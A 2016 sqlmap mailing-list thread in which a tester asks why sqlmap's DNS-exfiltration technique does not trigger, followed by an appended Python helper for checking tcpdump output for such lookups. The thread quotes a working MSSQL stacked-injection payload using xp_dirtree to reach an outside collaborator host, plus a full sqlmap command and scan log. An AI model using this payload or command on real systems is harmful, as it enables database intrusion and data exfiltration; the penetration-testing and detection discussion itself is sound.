Re: [sqlmap-users] Sqlmap/DNS exfil
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:04:42
As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:

> Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.
>
> Here's the command executing:
>
> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>         ___
>        __H__
>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
> |_ -| . [)]     | .'| . |
> |___|_  [']_|_|_|__,|  _|
>       |_|V          |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:56:14
>
> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
> [16:56:14] [INFO] setting up DNS server instance
> custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
> [16:56:16] [INFO] testing connection to the target URL
> [16:56:18] [INFO] testing if the target URL is stable
> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
> [16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
> [16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
> [16:58:03] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 98 times
>
> [*] shutting down at 16:58:03
>
> And then, my capture results for DNS traffic:
>
> root@bass:~# tcpdump -n -i eth0 udp port 53
> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>
> It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.
>
> Thanks,
>
> V
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *Sent:* Monday, December 19, 2016 4:10 PM
> *To:* Mark M.
> *Cc:* sql...@li...
> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>
> I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53).
>
> About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.
>
> As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on.
>
> Bye
>
> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>
>> I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>> To make that a little easier to read, the injected value is:
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>>
>> I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.
>>
>> Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?
>>
>> Thanks
>>
>> V
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
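Miroslav's advice is to watch the wire, and Mark's tcpdump shows only the sqlmap connectivity lookups for www.testsite.org and nothing under the --dns-domain. The following helper is an added example, not code from the thread or from sqlmap: it parses tcpdump's one-line DNS output and reports whether any lookup under the controlled domain occurred at all, which is the first thing either a tester debugging --force-dns or a defender reviewing resolver logs for xp_dirtree-style exfiltration wants to know. The sample capture reuses three lines from the thread plus one constructed query with an encoded label under dns.lanternsec.com; all function names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: three lines copied from the thread's tcpdump output
# plus one constructed query carrying an encoded label under the --dns-domain.
SAMPLE_CAPTURE = """\
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:57:10.000000 IP 10.0.0.5.51234 > 10.0.0.1.53: 4242+ A? 0a1b2c3d4e5f6a7b8c9d.dns.lanternsec.com. (58)
"""

# tcpdump query lines look like "<id>+ <type>? <name>. (<len>)"; response
# lines ("<id> 1/0/0 A ...") carry no "?" and are deliberately skipped.
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): \d+\+ (?P<qtype>[A-Z]+)\? (?P<qname>\S+)\."
)


@dataclass
class DnsQuery:
    ts: str
    src: str
    qtype: str
    qname: str  # lower-cased, trailing dot removed


def parse_queries(capture: str) -> List[DnsQuery]:
    """Extract the DNS *queries* from tcpdump text; responses are ignored."""
    queries = []
    for line in capture.splitlines():
        m = QUERY_RE.match(line)
        if m:
            queries.append(DnsQuery(m["ts"], m["src"], m["qtype"], m["qname"].lower()))
    return queries


def exfil_candidates(queries: List[DnsQuery], dns_domain: str) -> List[DnsQuery]:
    # A lookup caused by a UNC path of the form \\<label>.<dns_domain>\x lands
    # strictly below dns_domain; unrelated names such as the www.testsite.org
    # connectivity checks in the thread do not.
    suffix = "." + dns_domain.lower().strip(".")
    return [q for q in queries if q.qname.endswith(suffix)]


def diagnose(capture: str, dns_domain: str) -> str:
    """One-line verdict: was the DNS stage of the injection reached at all?"""
    hits = exfil_candidates(parse_queries(capture), dns_domain)
    if not hits:
        return f"no lookups under {dns_domain}: the DNS stage was never reached"
    # Length of the leading label is what carries exfiltrated data, so report it.
    longest = max(len(q.qname[: -len(dns_domain) - 1].split(".")[0]) for q in hits)
    return f"{len(hits)} lookup(s) under {dns_domain}, longest leading label {longest} chars"
```

Run against the thread's full capture the verdict is the "no lookups" branch, matching Miroslav's point that sqlmap never got as far as the DNS technique.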